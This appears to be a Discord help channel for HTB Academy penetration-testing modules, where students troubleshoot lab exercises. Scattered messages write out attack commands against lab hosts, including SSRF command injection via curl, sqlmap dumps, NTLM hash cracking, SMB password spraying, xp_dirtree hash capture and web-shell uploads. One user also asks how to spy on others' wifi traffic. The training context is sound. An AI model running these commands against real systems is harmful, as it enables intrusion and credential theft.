#modules

1 messages ยท Page 46 of 1

graceful rampart
#

๐Ÿ‘

dim cosmos
#

password attacks medium was an interesting turn of events....

quasi wave
#

how well recognized is CREST?

#

they are partnered with HTB Academy

#

lol

#

I'm thinking after security+ I might as well to the CREST penetration testing skill path

#

it only would make sense

#

depending on if CREST is a good place to get penetration testing certs from

#

in terms of HR

woeful ermine
#

I was wondering the same thing myself. If I am not mistaken, you need to get CPSA before getting CRT

#

CPSA is a multiple choice exam

#

after reading and all I think I go with comptia + security

#

it is more accepted and known by HR and companies looking for it

#

I ll go with CPTS then offensive sec certs

#

they are kind of the best but quite expensive when compared with others

leaden lichen
#

Guys i have a confusion in "Using web proxies" Module (i.e. Repeating Requests

#

) Can someone assist me? Thanks

#

Unable to find the flog

woeful ermine
#

which part

normal lagoon
#

Hey, I'm working on the Active Directory Bloodhound module, and I'm having a problem uploading the zip in Bloodhound

#

getting this error:

#

I tried using Kali and PwnBox. Same error. I did some Googling and I think they used SharpHound.ps1. Can anybody get this to the right people to perhaps run the SharpHound.exe ingestor?

#

Okay, I just pimpmykali and used the "fix Bloodhound' option. Seems to be working now on my Kali! Nice!

drowsy bane
#

Hey Folks, could anyone recommend a module that covers aws security? When I search for it it turns up a load of modules, then doesnโ€™t mention it in the summary of the module ๐Ÿ˜‚

acoustic owl
drowsy bane
#

Huh weird, it comes up as quoted text when you search for it

#

How about for general WebAppSec, Iโ€™ve done the basic ones

acoustic owl
# drowsy bane How about for general WebAppSec, Iโ€™ve done the basic ones

There are many modules
Blind SQL Injection
HTTPs/TLS Attacks
File Inclusion
SQL Injection Fundamentals
SQLMap Essentials
Cross-Site Scripting (XSS)
Login Brute Forcing
Broken Authentication
Command Injections
Web Attacks
File Upload Attacks
Server-side Attacks
Session Security
Web Service & API Attacks
Introduction to Deserialization Attacks
Attacking Authentication Mechanisms
Introduction to NoSQL Injection

drowsy bane
#

Cool you been looking into these, had been considering the deserialisation intro one, only a little was covered in starting point

#

I feel thereโ€™s tonnes more to learn there

green bolt
#

As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.

green bolt
rustic sage
#

Any solution to do the exercise with PetitPotam and PrintNightmare in Bleeding vulnerabitilies module, in AD section? NoPac seems to be the only tool to work weel

novel matrix
rustic sage
#

Hi! I'm stuck at SSRF Exploitation Example. I managed to run the following command:

||curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=ls" ||

but whenever I try anything with a space, for example, the following command:

||curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=uname -a" ||

I get the following error returned:

||URL can't contain control characters. '/load?q=http::////127.0.0.1:5000/runme?x=uname -a' (found at least ' ')||

Does this mean that this way of doing it as described in the exercise is not the way to do it? Can somebody help me ๐Ÿ™‚

novel matrix
#

@green bolt Spam that in every channel will just result in you getting a mute.

green bolt
#

ok

green bolt
novel matrix
green bolt
solemn moss
#

i know how to know ip page from cmd

dim cosmos
green bolt
dim cosmos
#

all those password list problems dont rely on rockyou etc

#

you need to create personalised username and password lists

#

(i.e. the point of the module)

orchid jungle
#

Hi! Anyone know if with the "Silver Annual" plan I can access the Tier III and IV modules?

#

Or just until the Tier II.

#

Ok, that was my fear. I'm in doubt because there are a lot of Tier III modules that I would like to do too. Maybe is better to contract the Platinum subscription.

solemn moss
#

ping (url adress)

#

in cmd try

rustic sage
azure cloak
#

I canโ€™t find fqdn of x.x.x.203 in footprinting module, I try many ways but canโ€™t find it. Any clues ?

turbid salmon
#

I try to finish the module ACTIVE DIRECTORY ENUMERATION & ATTACKS but I'm stucked on a question in the section AD Enumeration & Attacks - Skills Assessment Part I

#

I found an NTLM hash fdxxxxxxxxxxxxxxxxxxxxxxxxxxxx3a

#

Then, I used hashcat -m 1000 /tmp/hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
But I didn't find anything.

What am I doing wrong?

shadow canopy
#

in the Footprinting module > Cloud Resources > Google Search for AWS
intext:<text-covered> inurl:amazonaws.com

how to replicate this. text is covered. not sure what to search for

sly kelp
#

I need to confirm an answer from Introduction to active directory module >>Examining group policy section can i dm someone?

tidal kelp
#

Module Name: Attacking Common Services

Section Name: Attacking SMB

i have run this cmd ~/Tool/CrackMapExec/cme smb 10.129.203.6 -u 'jason' -p pws.list --local-auth , but i got nothing. can i dm someone for help? (PS: i got it)

rustic sage
#

where is general

novel matrix
tribal jetty
#

I have spent almost a week on the one question, where is the students mail. I have found it......mail:/var/mail:/usr/sbin/nologin
I have chopped that path up many different ways as well, to get it to work. I have tried both the etc command and the env command. I have tried everything. Im not trying to rag but I think you should take that questioon off there, I have wasted alot of time with it. either its broken, or Im just not doing it right. here let me paste the whole line.
mailโŒ8:8:mail:/var/mail:/usr/sbin/nologin

#

define path, is that different than pwd? What am I suppose to learn from this question. Thats the main goal anyways. I think ive got the searching path thing down pretty well ll, ls -a , pwd, cat /etc/passwd, uname -a,. Ive been down every file on the students shell

runic rover
#

Hello, everyone i'm trying to complete Skill Assessment for "File Upload Attacks" when i'm trying to upload the file it's using get request to file upload and just name is being sent to server side. any hint where to start. i can see upload.php in script.js but don't know what to do ?

solemn moss
#

Hey can u help me with know what everybody do in my wifi

#

Spy other in wifi

shadow canopy
runic rover
shadow canopy
runic rover
shadow canopy
#

i think if you can upload an image to find source code
look at section (Limited File Uploads)

turbid salmon
#

Is there someone that has finished the ACTIVE DIRECTORY ENUMERATION & ATTACKS module? I am stucked on trying to crack a NTLM hash since 3 days ๐Ÿ˜ฆ

proud pine
turbid salmon
#

You're right but I have not any other idea. Basically, I am on a question that tells me to find a password, and all I have is the NTLM hash. I searched for files that could contain a password. I also search for it on the description of the user: nothing). Have you completed this module?

plain coral
azure cloak
#

Dev contains multiple subdomains

#

Thank for you answer

plain coral
limpid raft
#

Hi guys, i'm stuck at Internal Password Spraying - from Windows. I try to find the user with password 'Winter2022.'. When I run the ps script as shown in the module it just doesn't write anything to the outputfile ;/ Can anyone help me?

rancid pivot
#

Hello guys, I just join this community, want to try learn from here, I'm already stuck at the first module,
It ask me " Based on the commands executed, what is likely to be the operating system flavor of this instance?
Linux htb-uxufv3qysx 6.0.0-12parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.12-1parrot1 (2023-01-12) x86_64 GNU/Linux "
And I obviously answer :
"The operating system flavor of this instance is likely to be a version of Debian Linux. The text "Debian 6.0.12-1parrot1" in the output of the command gives an indication that this particular version of Linux is based on Debian and version 6.0.12-1parrot1."

But its not working, wont give me right.. help me please!

buoyant escarp
wheat adder
#

i would like to subscribe to the student plan but i currently dont have access to it and i dont know what an academic email is

rancid pivot
proud pine
buoyant escarp
leaden quail
#

Which section?

#

yeah sure

fathom pendant
wheat adder
#

Okay thank u

leaden quail
#

I want to sent a file from my linux host to a windows host in a internal network (which offer ssh)

#

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.35:22 ... OK
mlefay@172.16.5.35's password:
scp: Connection closed

#

but the upload does not work

#

is my syntax correct?

wispy pulsar
#

can someone help me with password attacks-Network Services, i got all the questions except the one about rdp, i tried using the given passwords and username lists with crackmapexec and hyrdra but got nothing

dim hemlock
#

Hi all I hope you are having a good day. I have got a question about a question from Password Attacks Module:
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.
I have created the file but there is 94044 tries to be done. Is this how its suppose to be

flint depot
#

guys

#

I need help

#

Here is my problem

#

I'm using a windows computer and my other hack computer isn't working anymore but I wanna continue hacking, so I need to download linux on a windows computer but im worried that it will erase all my stuff from windows

#

so I downloaded Virtual Box but what is its use?

#

what do i do guys

#

I NEED HELP

#

pls

sly tapir
#

if this isnt related to a module, i would take this general chat, or community help... VirtualBox allows you to run multiple OS at the same time.

flint depot
#

bro

#

I on't have the general channel

#

it doesn't show up on my screen

sly tapir
#

you need to verify yourself

flint depot
#

didn't i already did that

#

where do i verify

sly tapir
flint depot
#

thx

kind sable
#

Hey can someone help me 2 install open vpn and configure it for labs? thx

kind sable
#

Im using parrot os

kind sable
#

When i donwload it it saves at .exe

#

and im on a linux machine

sly tapir
#

open terminal and type sudo apt install openvpn

kind sable
#

OK

kind sable
#

Also another problem is that when i try to use telnet it gives me this error telnet: Unable to connect to remote host: Connection timed out

graceful rampart
#

This is not related to Academy modules. Please don't have this conversation in here

placid quest
#

@flint depot why not visit YouTube

sly tapir
#

I dont understand how people can see Academy modules chat when not verified, but cant see the general chat...isnt that backwards

fathom pendant
rustic sage
#

Hello, I'm stuck at SQLmap essentials ~ Attack Tuning. I have to get the content of table "flag6" - "Detect and exploit SQLi vulnerability in GET parameter col having non-standard boundaries". I use this command sqlmap http://167.99.195.247:32676/case6.php?col=id --random-agent --batch --dump --prefix='`)' --level=5 --risk=3 but it doesn't give me any injections. Could anyone give me a hint please?

placid quest
flint depot
#

yea

#

thanks

kind sable
#

Is there any way to put the academy on spanish?

placid quest
#

@flint depot no problem

graceful rampart
rustic sage
graceful rampart
rustic sage
#

๐Ÿ‘

graceful rampart
#

You don't need GO in mssqlclient

rustic sage
graceful rampart
#

A bit of educated guessing.

rustic sage
#

but there could be so many possibilites right?

graceful rampart
#

Yes

rustic sage
graceful rampart
#

Because col=1 is not the correct amount of columns. Idk why it works with col=id

#

Count the number of columns on the oage lol

rustic sage
#

well there are 5 columns

graceful rampart
#

Well sometimes sqlmap has issues detecting how many columns there are. So you need to tell it how many columns there are

rustic sage
#

--union-cols=5 right?

graceful rampart
#

Yes

#

Cuz again, there are 5 columns

rustic sage
#

thanks, i got the flag

fathom pendant
#

Or some SQL nonsense

graceful rampart
#

Well yea, logically that's the only thing that makes sense

#

But actually no. Why would that work.

fathom pendant
#

SQL is something I want to dive deep into, but also don't

#

Like even just to understand some of the why's

graceful rampart
#

Lmao. SQL is... SQL. I had a professor for my intro to databases class last semester who said "If your a bad database administrator, you'll make yourself vulnerable to SQL Injection"

#

I got up and walked out of the room

tidal kelp
graceful rampart
#

I mean, I guess, but I can't promise I'll get back to you right away

tidal kelp
graceful rampart
#

Yes

kind sable
#

It exist any module that teach you to program or I have to learn that on other websites?

brisk geode
#

depends on that

kind sable
graceful rampart
brisk geode
kind sable
raven cairn
graceful rampart
#

^^

raven cairn
#

Then just screw around and learn the ins and outs

#

Make games, make applications, start a github, etc.

#

You learn programming by doing.

graceful rampart
#

You learn tech in general by doing. Dosent matter what specific subject you chose to focus on

solid python
#

Running into an issue with the medium lab on the enumeration with nmap module

tidal kelp
#

can i dm you for help? mssqlclient.py WIN-02/mssqlsvc:XXXXXXXX@10.129.203.12 -db flagDB i can't access via mssqlclient (PS. I got it)

solid python
#

Despite following examples given in the prior page regarding version detection against filtered ports, the port remains filter regardless of the source port I specify

graceful rampart
buoyant escarp
#

I hope there comes a module for xxe :/

acoustic owl
runic rover
#

Hello everyone, i'm trying to complete Skills Assessment - File Upload Attacks when i'm trying to upload file and every time i get Only images are allowed i tried all of Content-Type and and added magic byes nothing working. Any Hint ?

acoustic owl
runic rover
upper lake
#

hi everybody, I am at the nmap hardlab, I found the missing port and I am trying to get the version, but had no luck so far. I also tried with netcat, but could not connect. Someone any more hints on this one? I would love some support on this one

rustic sage
#

Why doesn't sqlmap http://143.110.166.29:32448/case9.php?id=1&uid=1947156619 --randomize=uid --batch --dump work insted of sqlmap -u "http://143.110.166.29:32448/case9.php?id=1&uid=1947156619" --randomize=uid --batch --dump?

acoustic owl
graceful rampart
rustic sage
runic rover
wicked flicker
#

Hi guys, i'm having problems with the section brute forcing cookies of Broken authentication module? Any help?

wicked flicker
acoustic owl
#

Try to read and understand the source code.

runic rover
acoustic owl
azure cloak
fathom pendant
#

I think saying like a lion might make him look for a wrong list. But the descriptors definitely a good hint

thorn urchin
#

lions are pretty fierce though

marble raft
#

After banging my head against the keyboard and getting some help from @west canopy i finally managed to pass the Predictable Reset Token section on Broken Authentication module, these are some tips that will nudge in the right direction and avoid frustration.

Use the script bellow for Q1

pastecode.io/s/m58pup5y

The server runs on GMT time, most of the trouble that i had with online epoch converters is that they would convert to my timezone not GMT, and the time needs to be in milliseconds, otherwise it won't work.

Pay attention to that, otherwise you won't get the flag.

For Q2 the temp password follows the same pattern both for the htbuser and the htbadmin and is encoded.
You need to discover how it was encoded and if it was double, triple or more encoded.

You can use a cyberchef or any other online, i recommend dencode.com for easy of usage.

After you get the cleartext, change what it needs to be changed then encode it back to login.

rustic sage
#

How do I get the final flag at the SQLmap Essentials Assessment? I found the a***.php site with the ID data param but it doesn't seem to be injectable. I found no other attack vector. Could someone give me a hint?

sly tapir
devout torrent
#

So in Shells & Payloads- The Live Engagement module, I am using EternalBlue to try to get to the server :

#

but everytime i run it says

#

Exploit completed, but no session was created.

devout torrent
#

I tried different payloads but i keep getting the same thing

sly tapir
graceful rampart
rustic sage
graceful rampart
#

Yea. You have to do it the second way

sly tapir
rustic sage
#

ok thanks

graceful rampart
#

Yea. If you save the request it'll already be formatted properly

rustic sage
#

think i got the injection, but why is typing sqlmap it so slow?

#

types character by character

graceful rampart
#

Cuz its doing a time based injection

#

Yes, it's painfully slow. No, there's nothing you can do about it

rustic sage
#

Ok ๐Ÿ˜ฆ

devout torrent
#

Ty for the hint

graceful rampart
#

Np

rustic sage
#

The flag is slowly comin up ^^

ripe terrace
rustic sage
high sentinel
high sentinel
sly tapir
#

dude, i spent hours doing this Footprinting - medium lab, and I have tried the same thing multiple times--- reset the server twice and then it works

mint cape
#

Hi,

could someone help with Assessment 2 for noSQL injection, please?

I have tried much payloads and have no idea, how to pwn it, please help

high sentinel
#

What's the issue you're having?

mint cape
#

I have tried to execute payloads, but it doesnt work

#

you need ip for testing or what ?

high sentinel
#

what do you mean by "execute payloads"?
ip for testing? ๐Ÿ˜„ what? ๐Ÿ˜„

#

afaik most of the modules is setup in a way that you can interact with them from htb vpn

mint cape
#

ok, i will try

#

you mean, I can connect to ip, which was given me for testing (HTB lab)

high sentinel
#

like can you see the stuff that you're supposed to be hacking?

mint cape
#

no, i don't use vpn

fathom pendant
#

Are you using the pwnbox?

mint cape
mint cape
fathom pendant
#

You are using your own vm?

mint cape
#

no

fathom pendant
#

So you are using the virtual machine from the website

mint cape
#

right now, i have swithed to my windows pc without vpns or so on

#

and i have opened it

fathom pendant
#

That may be why if you it an IP that is 10.x.x.x you need to attack it using a VM through the VPN or through the pwnbox

mint cape
#

it's web application

#

ip is 161...*

high sentinel
#

oh it's publicly available?

mint cape
#

yes

high sentinel
#

you don't need vpn then

fathom pendant
#

If it's a web app you should be fine to access it wherever. But it is not recommended to use a Windows machine to do any of the enumeration or anything like that through tools

mint cape
#

yes, i also have kali instance on that pc

#

(not kali VM)

fathom pendant
#

So you are dual booting with Kali

mint cape
#

yes, something like this

fathom pendant
mint cape
fathom pendant
#

Within the module I mean

mint cape
#

within the module - I have tried each payload

#

and it doesn't work

marble raft
#

Any help on Skills Assessment - Broken Authentication?

quasi moth
#

Hello, I have a biiit problem in Login Brute Forcing module, Service Skills Assessment, the last task. I know the user, and try to bruteforce FTP localhost using rockyou-30, but still that doesn't help

sly tapir
#

could someone give me a nudge with Footprinting - Medium. I'm logged in as Administrator, think im stuck due to lack of MSSQL exp...

high sentinel
sly tapir
high sentinel
sly tapir
high sentinel
#

maybe try using stuff like payload all the things

#

that's somehow educative on sqli or just direct db interaction

#

@iron plaza need help? ๐Ÿ˜„

iron plaza
high sentinel
#

that's the reason why ctrl + x exists ๐Ÿ™‚

#

just ctrl + a, ctrl +x, type new message, ctrl + v ๐Ÿ˜„

iron plaza
#

With regards to the second question in the Shells & Payloads' Live Engagement I have uploaded the ||cmd.war|| file from ||laudanum ||in the manager's section then went to|| .../cmd/cmd.jsp|| and placed my commands for cmd... I got hit with systeminfo and whoami but when I try dir or anything else it gives error so how I do go about browsing the C:\ directory or am I missing something?

high sentinel
#

what kind of error?

iron plaza
#

like random java error from the site

high sentinel
#

does just dir work?

iron plaza
#

seems the shell is not a full fledged shell

iron plaza
high sentinel
#

hmm

#

is it in vpn or publicly available?

iron plaza
#

vpn and can only be accessed by rdp-ing to the foothold first

high sentinel
sly tapir
high sentinel
sly tapir
#

No worries

fathom pendant
#

If you're RDP in it's a bit easier

iron plaza
high sentinel
#

rev shell is not the same thing as cmd exec payload

sly tapir
high sentinel
fathom pendant
#

Navigating the sql ui is a bit of a pain

sly tapir
#

Ill open my eyes and look again ๐Ÿ˜‚

iron plaza
high sentinel
#

so you have a rev shell?

iron plaza
#

no I dont have a rev shell I only get the cmd exec

high sentinel
#

ok, i thought that's the case. At that point you likely want to get a rev shell for ease of use but there might be issues with the actual shell execution because you're having issues using dir. I would try to carefully look at the error message you get while using dir and then possibly compare it to something like dir c:\. If you manage that to work somehow, i'd get a rev shell afterwards

#

thinking about it, you can possibly also create a payload that's just a rev shell itself and not a cmd exec payload, i assume you've used msfvenom to generate the payload. If that's the case you just use different payload when generating and that should be it to get a rev shell more easily

iron plaza
#

I probably have to tinker with it ... The only other thing I can think of is uploading another type of shell and relabel it as a WAR file through burpsuite

high sentinel
#

yeah, as i've said you can try uploading actual rev shell payload instead of cmd exec payload

iron plaza
#

thanks ... will try that

analog tendon
#

Hey guys. im having an issue on the nmap firewall medium lab. is it asking for the version number of the DNS service or just the version name? im able to get the version number of just about every other service except the DNS

#

is there anyone that could point me in the right direction?

acoustic owl
wheat garden
#

think with -t switch

analog tendon
analog tendon
analog tendon
analog tendon
#

i tried quite a few. do i need to use the filter to put them up here?

acoustic owl
analog tendon
#

thats one that i tried.

#

got the name. not the number. name was wrong

rustic sage
#

yo mods, how is my name "Alpha" breaking the rules?

novel matrix
rustic sage
high sentinel
analog tendon
high sentinel
#

huh, nmap should work the same everywhere regardless of distro used

fathom pendant
#

Most likely just needed to reset the VPN connection

#

If it worked on pwnbox and not on vm

analog tendon
#

idk. ran it on my VM instance and the script didnt run. ran the same command on pwnbox and the script ran

#

i was able to get everything else except that specific script to run

#

guess i need to do some updates

high sentinel
#

did it somehow error out?

analog tendon
#

no. just didnt do anything

fathom pendant
#

Probably update

analog tendon
#

acted like i just did a normal udp scan with no zcripts

#

updating now

fathom pendant
#

Or just version difference, did you catch the nmap version on pwnbox

high sentinel
high sentinel
#

is your vpn working just fine on your box?

fathom pendant
#

and you were able to scan it just fine ยฏ_(ใƒ„)_/ยฏ

high sentinel
#

(can you ping the box just fine?)

analog tendon
#

yes. all scans worked as they should. just not the script

#

sorry not that particular script

high sentinel
#

interesting, no clue what that's about

fathom pendant
#

Weird

analog tendon
#

im gonna work on it before continuing. if its not working now it could cause me issues later. thanks everyone for all the help. im sure ill be back here soon lol

high sentinel
analog tendon
#

i just may do that too.

sly tapir
#

Finally got it! Man, I was so focused on something else

acoustic owl
#

Or watch the HTB AMA video. There is also this question

marble raft
#

Hey Bunny, could i get some help on the Broken Auth Skills Assessment? I'm having some trouble on figuring what to do next

sterile thistle
#

Hello can someone please help me figure out why redis for redeemer isnโ€™t working

#

When I ping the server, I get Pong I full connect with it but the second I type a command to pull or see data from the server the server stops

analog tendon
fathom pendant
high sentinel
fathom pendant
#

It's not

#

HTB standard site w/boxes is separate from academy, different accounts - it would be cool if they would merge them

high sentinel
#

i thought it was more like starting point boxes vs regular boxes - it's pretty much the same from my point of view

fathom pendant
#

I told you the better place to ask your question

#

This channel is for modules on htb academy

sterile thistle
mild sky
#

okay i searched the forums for answers and still could not figure it out, zero issues with thm vpn and connecting so i don't think i am doing anything wrong. problem is it says both lab and starting point are connected but i can't even ping the damn box.. whats up? not a paying member yet, are these dead machines?? wtf?

#

also switched from udp to tcp, nothing..

fathom pendant
#

Take a step back; what is the machine you're trying to attack, what module is it on, if it's related to the #starting-point boxes on the main site check there

mild sky
#

hmmm

fathom pendant
pliant parrot
#

hi

mild sky
#

it does connect, i think i am trying to access paid shit idk

#

perhaps that is why i cannot ping box

fathom pendant
#

If it's not a 10.x.x.x format then it may be a web server you're trying to access, in which case it will be formatted as ip:port

analog tendon
#

ok guys update from the issue earlier. I moved over to my kali box and was having the same exact issue. but i noticed i was using the TCP VPN connection. I then downloaded a fresh UDP connection file and connected that way. reran the exact same command that worked on the pwn box and was able to get the script to get the bind.version to show up. idk if this will help anyone else having the issue or prove im an idiot but hey thats what i discovered

fathom pendant
#

If it is a webpage then try navigating through your web browser

mild sky
#

er

fathom pendant
#

But you're not telling us what module or content you're attempting

#

Starting point machines are free on the htb main site

#

So it shouldn't be an issue of "paid content" but you're freaking out and not actually providing much info aside from "I can't connect" which really doesn't help

mild sky
#

not freaking out lol, many ctf platforms to pop

bright ridge
#

you are giving useless info though, @mild sky

#

how about actually answer him?

mild sky
#

go dictate elsewhere

fathom pendant
#

Cool won't help you then

#

It's also possible the box is not able to be pinged at all, sometimes that is the case

#

But accessible via other means

graceful rampart
# mild sky go dictate elsewhere

I said this to someone a few days ago, and I'll say it again here. Nobody is obligated to help you. If someone takes the time to try to help you sort out your issue the least you can do is be nice to them. They get nothing out of helping you and are doing so solely to be nice. If you decide to be an ass you're not gonna get help, simple as that

fathom pendant
#

Anyway that's all the help that can be offered with the limited information provided

#

99% of the time with content, it's a user issue not a box issue

fathom pendant
mild sky
#

mmmk

#

nice place you guys have here

#

:^)

fathom pendant
#

It is nice

#

As stated, without much other information not much we can do to assist you

mild sky
#

it's okay i'm doing other ctf's anyways, figured i sign up to htb is all

graceful rampart
fathom pendant
#

Same

fathom pendant
mild sky
#

nah, ran sudo killall openvpn then reconnected and still same issue, ill look more into later it's no big deal

fathom pendant
#

Just throwing darts at the dartboard

compact garnet
#

So, I was able to solve the โ€œenumerate the SMTP service even further and find the username that exists on the systemโ€ I did this using the smtp-user-enum tool. And yet, for some unknown reason to me, they all showed up as โ€œno resultโ€ so then I went an manually VRFY each user via telnet and one of them finally showed code 252 ๐Ÿ™‚ โ€ฆcould someone explain to me why this happened? Just wondering why the smtp-user-enum displayed the answer as no result ๐Ÿ˜•

fathom pendant
graceful rampart
fathom pendant
#

I doubt they even know what academy is tbh tux

graceful rampart
#

Fair point

fathom pendant
#

Sounds like they're stuck on the starting point box

graceful rampart
#

God, they really gotta put this channel behind verification

fathom pendant
#

But seeing as they probably don't have reading comprehension: they probably didn't read #welcome

graceful rampart
acoustic owl
graceful rampart
#

Ah yea, that's it. Been a while since I did that module

compact garnet
acoustic owl
# compact garnet Ohhhh, I see...Is there any way to change such default value? Im just curious th...
fathom pendant
#

^

compact garnet
#

hmmm I see, apparently it only waits for 5< seconds for a reply by default...so that's why! ๐Ÿ˜… well, now we know

fathom pendant
#

Yeah telnet is a slowwww service

#

I think that w argument that is most common is 15

floral sandal
#

guys do u face VPN issues ?

dim cosmos
#

Small (timesaver) for the Password module HARD please ! - for the Johanna account i realise i need to use the hashcat applied custom rules to the password list in the resources - but did you also apply the password policy rules from earlier in the section to reduce the size of the mutated password list? i.e. remove shorter than 8, remove no special chars, remove no numbers ? thx

dim cosmos
#

Got it, all good, always post before waiting long enough lol

sly tapir
#

footprinting hard lab was fun, better than the medium

buoyant escarp
coarse oak
#

Anyone available to assist with the flag.txt location on Attacking Common Applications - Skills Assessment II please? I've tried searching with ||find / -name flag.txt 2>/dev/null|| and ||find / -name flag* 2>/dev/null||, but I'm not finding it. Are we supposed to priv esc here?

compact garnet
#

omg I finally completed all tasks on the IMAP/POP3 module...man, accessing those emails for the flag was a bit confusing...I just wasn't used to those imap commands at all...but i finally got it...after 5 hours ๐Ÿ˜ฉ

buoyant escarp
placid quest
#

@compact garnet next time try with evolution

quasi moth
#

Hello, I have a biiit problem in Login Brute Forcing module, Service Skills Assessment, the last task. I know the user, and try to bruteforce FTP localhost using rockyou-30, but still that doesn't help

placid quest
#

@quasi moth I am on that selection and think u will use the password list that u created

placid quest
#

Yeap give it a try

dim cosmos
#

how good is a successful evil-winrm login on administrator for passwd lab hard kek

arctic sentinel
#

Hello! Anyone working with the attacking common services modules! the attacking smb section!

autumn pilot
#

do you have a specific question about the exercise or in general you are seeking to do it with other person as well?

arctic sentinel
#

Im stuck in a part of the exercise, Ive tried some things but running out of ideas!

autumn pilot
#

There are like 3 questions, mind sharing on which one of them you are stuck?

arctic sentinel
#

I`m trying to find the password for the user, but I brute force with the resource list and get nothing... I tried to download the id_rsa file through the NULL session but I get access denied...

#

Im looking for the enum4linux-ng.py that the cheatsheet mentions but I cant find it in github...

autumn pilot
#

You have the username and you have a potential password list, use them

arctic sentinel
#

I used them but it`s doesnt find any matching password...

#

I tried both hydra and crackmapexec...

#

I tried to both smb and ssh protocol

#

I must be doing something wrong...

autumn pilot
#

The password is there, work on your commands

arctic sentinel
#

there must be something else than just typing the commands....

arctic sentinel
autumn pilot
#

it is very important how you craft your command

arctic sentinel
#

crackmapexec smb 10.129.56.219 -u jason -p ./pass.txt

#

I will check other ways to craft it...

#

I will try with .list instead of .txt

autumn pilot
#

a machine could have a hostname, and that hostname might be required to be used for certain actions

arctic sentinel
#

I have the host name ATTCSVC-LINUX

#

I haven`t use crackmap without the ip...

#

Im reading the manual and I cant find anywhere the hostname option....

#

I can use a -d ...

autumn pilot
#

go for it then

arctic sentinel
#

Got it!

#

Now I`m looking for the command to use the private key I got!

#

any useful guide where these commands appear?!?!

autumn pilot
#

man ssh

arctic sentinel
#

Got it!!!

#

Thaaaaanks!!!!

rustic sage
#

Hi

#

Can I get some help with "Footprinting lab - medium"?
||I have a shell and currently interacting with sqlcmd but I don't have permissions to view "accounts" database. I know I am close but there is something I am missing. ||

arctic sentinel
rustic sage
old hound
#

I'm doing the the Windows Priv Escalation Skills Assessment Part 1
But I cant ping the target machine
100% packet loss
Anyone with that problem too?

coarse oak
#

In Attacking Common Applications - Attacking GitLab, is there any hint to what users wordlist to use? I think I've used everyone in /usr/share/seclists/Usernames, and now at the xato ones. But I have to pause and resume every time the box times out. I'm doing the attack through Burpsuite. I've found some valid usernames, but nothing that is accepted as the answer.

storm jackal
storm jackal
old hound
#

yea

storm jackal
#

ahhh okay. I guess that explains why it took me a while to connect over vpn too

livid bluff
#

Hi,
I am again blocked on the file upload module.
It is one of the least complicated modules and yet I am still stuck ...
In the section filter type.
I found an authorized extension, I use the double extension.
I have a content-type which is an image and I added the MIME.
The shell is well uploaded but instead of executing the php code it displays it in Burp and in the browser it tells me that there is an error in the file.

storm jackal
livid bluff
old hound
#

no spoilers please

storm jackal
#

same can't connect to any modules

rustic sage
#

O

toxic sedge
#

i am new how tto yuse

plucky bobcat
#

hash

toxic sedge
#

means

uncut meadow
#

Hi, Im stucked in Attacking common services - Attacking DNS module. Can somebody give me a hint?

uncut meadow
#

I have found subdomains but Im not able to transfer attack those names

#

I guess that's what I have to do but question is not so clear for me

marble raft
#

Did you add inlanefreight.htb to your /etc/hosts? You could either try to get a zone transfer with dig based on the name servers you have gathered or you could bruteforce the subdomains with subbrute

uncut meadow
#

yes I add every discovered domains in /etc/hosts and I axfr attacked every domains but nothing.

#

Can I DM you?

marble raft
#

yeah sure!!

toxic sedge
#

i am new

#

how i sumbit root flag

hollow obsidian
#

i'm stuck on that too, are you on meow

#

@toxic sedge i'm stuck on that too, are you on meow

toxic sedge
#

i know

#

how todo

#

do windows key +r

graceful rampart
#

Please don't have this conversation in this channel. It's not in the slightest bit related ti HTB Academy modules

hollow obsidian
#

ok

toxic sedge
#

and type machine ip adress

hollow obsidian
#

@graceful rampart although this is coming up as Academy modules?

graceful rampart
#

Yes. This channel is for academy modules. You guys are discussing starting point machines which are not a part of htb academy

old hound
rustic sage
#

Yo

#

Who wants to playe server siege

#

1v1

graceful rampart
old hound
#

extended maintenance*

arctic sentinel
#

Hello! Anyone working with the attacking SQL section?!

autumn pilot
#

whats your question

arctic sentinel
#

Im trying to steal the hash but I cant get the command right...

#

I type the command in the sql... and then in my pawnbox happens nothing...

#

How do I even know if I typing the right command...

fathom pendant
#

Are you getting a new line when you hit enter?

#

Are you ending the SQL query with ;

arctic sentinel
#

it`s not working

#

the mysql doesnt work I dont know why

graceful rampart
#

Unless you show us a screenshot or an error message there isn't much anyone can do to help you

fathom pendant
#

"it's not working" leaves a lot open to interpretation

arctic sentinel
#

I know! sorry!

#

I type this in the sql

graceful rampart
#

There's an extra period at the end of that IP

arctic sentinel
#

and then this in my pawnbox

#

Main thing is that I dont know if it should work... Im trying to follow the section...

graceful rampart
#

Yes. Youredoing it right. You have an extra period in the IP in your SQL command. It should be EXEC master..xp/dirtree '\\10.129.74.243\share'

arctic sentinel
#

I dont see any "share" folder created in my machine... its kind of awkward that I will work

autumn pilot
#

this is not the IP that you should use

graceful rampart
#

That too

#

But there's also an extra period

marble raft
#

Tux did you finish the Broken Authentication Module? If so, could you give me a nudge on the right direction on the Skills Assessment section? I've been stuck at enumerating users and can't seem to find any.

arctic sentinel
#

I tried with my IP but it doesn`t work...

autumn pilot
#

following the examples in the section of the module will help you go through, carefully go through them in order to understand the methodology and tools

#

try to visualise what needs to happen, once you've managed to do that

#

you will be able to get the desired result

arctic sentinel
#

They don`t explain much the commands they use... I assume "something" called share must be created in my machine...

#

neither responder or impacket work...

autumn pilot
#

both sql command examples have a description what will happen, even if its a short one

arctic sentinel
#

I think I got it

young cave
#

hey guys, i need a little help with the bash scripting module.
Submit the echo statement that would print "www2.inlanefreight.com" when running the last "Arrays.sh" script.
Can anyone help out with the answer format?

sterile spindle
#

